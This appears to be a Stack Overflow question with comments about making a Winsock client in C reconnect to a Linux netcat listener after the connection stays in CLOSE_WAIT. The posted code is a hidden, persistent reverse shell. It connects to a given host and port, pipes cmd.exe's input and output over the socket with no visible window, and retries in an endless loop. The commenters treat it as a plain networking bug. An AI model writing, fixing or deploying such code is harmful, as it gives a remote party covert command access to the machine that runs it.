# Reset Socket if connection failed in C

Tags: c, windows, winsock, winsock2

I have a socket application that will connect to a IP:PORT. I put it in a Sleep loop so that if the connection closed, it will connect back after X seconds. This works fine on a Windows -> Windows setup. When running this program on Windows and trying to connect to Linux I run into a issue. It will connect to my Linux box just fine. But if I close the connection on the Linux box and then open NetCat up again to listen back for the connection it doesn't work. I checked the netstat on Linux and it shows the port listening which is fine. Then I check on Windows and the socket is held up with a `CLOSE WAIT` status.

I was thinking about putting this socket into a loop that if the connection is not successful, wait 10 seconds and then try again. I put about 15 seconds for the `CLOSE_WAIT` to clear out so that the program can call back to Linux.

I am running `nc -lp 9090` on Linux to open the port. And I have tried closing the connection by using both `CTRL+C` and `exit`. Both do the same thing. The port on Windows (the machine running the script below) stays in a `CLOSE_WAIT` status.

```
void RunSocket(char *a, char *b, int secs) {

    while(1) {
        WSADATA wsaData;
        SOCKET Winsock;
        struct sockaddr_in hax;
        char ip_addr[16];
        STARTUPINFO ini_processo;
        PROCESS_INFORMATION processo_info;

        WSAStartup(MAKEWORD(2,2), &wsaData);
        Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

        struct hostent *host;
        host = gethostbyname(a);
        strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

        hax.sin_family = AF_INET;
        hax.sin_port = htons(atoi(b));
        hax.sin_addr.s_addr =inet_addr(ip_addr);

        while (WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL) != 0) { //returns 0 if successful

            MessageBox(0,"Did not connect.","Error",1); // Just error checking
            closesocket(b); // Thought this could get rid of CLOSE_WAIT
            Sleep(15000); // Give it time to close?
            continue;
        }

        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb=sizeof(ini_processo);
        ini_processo.dwFlags=STARTF_USESTDHANDLES;
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
        CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &ini_processo, &processo_info);
    Sleep(secs);
    }
```

Comment: Are you sure?  `FIN-WAIT-1` and `FIN-WAIT-2` states should occur only on the side that initiated the connection closure.  If it was on the Linux side that you did so, as you say, then you should not see a `FIN-WAIT-2` on the Windows side.

Comment: So I was pretty sure it was on the Windows machine that showed that. But right now where I am at is a `CLOSE_WAIT` on the windows machine. So now when it connects to my linux box, I can close the connection on linux and the windows box hangs at `CLOSE_WAIT`. I am updating code with what I have now.

Comment: How was the connection closed on the linux end?

Comment: CTRL + C.. Should I test with `exit`? EDIT: Tested with `exit` and same response. I am getting CLOSE_WAIT on windows.

Comment: Your Windows code is a bit odd, and not entirely consistent with your description.  In the first place, there is no need to call `WSAStartup()` inside the loop.  It's probably not harmful to do so, but at minimum it is wasteful.  You should only need to call it once. In the second place you are not "resetting" any socket, you are creating a new one (or so it appears).  But that's indeed what I would recommend.

Comment: Additionally, if you intend to call `closesocket()` then you must send it a correct argument: a `SOCKET`, not a `char *`.

Comment: I am still learning C and how all this works so that is why this is a bit odd. I am working on getting it to work, then going to go over it and optimize it. I put the `while (1)` loop on the top just for testing and haven't moved it. I am just unsure of how to do it.

Comment: Since you seem to be using `netcat` as the server on the Linux side, it would be appropriate to edit your question to show the exact `netcat` command you are using.  While you're at it, describe *in the question* what you are doing to close the connection.

Comment: I updated the original post.